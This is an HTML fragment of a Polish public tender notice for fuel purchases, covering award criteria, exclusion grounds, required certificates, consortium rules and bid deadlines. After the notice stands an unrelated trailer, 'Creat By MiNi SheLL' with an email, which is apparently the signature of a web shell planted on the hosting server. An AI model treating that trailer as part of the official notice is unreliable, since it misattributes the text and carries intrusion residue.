class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">R – zastosowany rabat na paliwo do ceny w dniu zakupu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">T – termin płatności za paliwo (nie krótszy niż 14 dni i nie dłuższy 30 dni)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">S – ilość stacji paliw w województwie lubelskim</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">36</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie przepisów art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1 i 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507),<br/>2) spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy PZP:<br/>a) posiadania zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>b) posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Warunek ten zostanie spełniony w przypadku prowadzenia przez Wykonawcę działalności w oparciu koncesję na obrót paliwami ciekłymi, wydaną przez Urząd Regulacji Energetyki zgodnie z ustawą z dnia 10 kwietnia 1997 r. - Prawo Energetyczne (t.j. Dz.U. z 2024 r. poz. 266 ze zm.).<br/>c) sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia.<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>d) zdolności technicznej lub zawodowej.<br/>Zamawiający nie stawia warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy.<br/>W przypadku oferty wspólnej ww. odpis składa każdy z Wykonawców składających ofertę wspólną.<br/>2)	oświadczenia wykonawcy, w zakresie art.108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2024 r. poz. 594 ze zm.) z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie ze wzorem stanowiącym załącznik nr 4 do niniejszej SWZ.<br/>3)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>4)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie o braku podstaw do wykluczenia z postępowania oraz spełnianiu warunków w postępowaniu.<br/>2) aktualna koncesja na obrót paliwami ciekłymi, wydanej przez Urząd Regulacji Energetyki zgodnie z ustawą z dnia 10 kwietnia 1997 r. - Prawo Energetyczne (t.j. Dz.U. z 2024 r. poz. 266 ze zm.).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy zamierzający wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy złożyć w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym za pośrednictwem Portalu. Pełnomocnictwo musi wskazywać w szczególności:<br/>a) postępowanie o zamówienie publiczne, którego dotyczy,<br/>b) Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika,<br/>c) zakres jego umocowania.<br/>Pełnomocnictwo musi być podpisane w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej Wykonawcy.<br/>2. Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich partnerów, przy czym<br/>termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia. Umowa taka winna określać strony umowy, cel działania, sposób współdziałania, solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum.<br/>3. Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa elektronicznie odrębne oświadczenie, wg wzoru stanowiącego załącznik nr do SWZ. Dokumenty te mają potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na Platformie e-Zamówienia za pośrednictwem zakładki „Oferty/wnioski” widocznej w podglądzie postępowania na stronie https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d0dd95fb-093f-475a-92b2-41711e020958</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com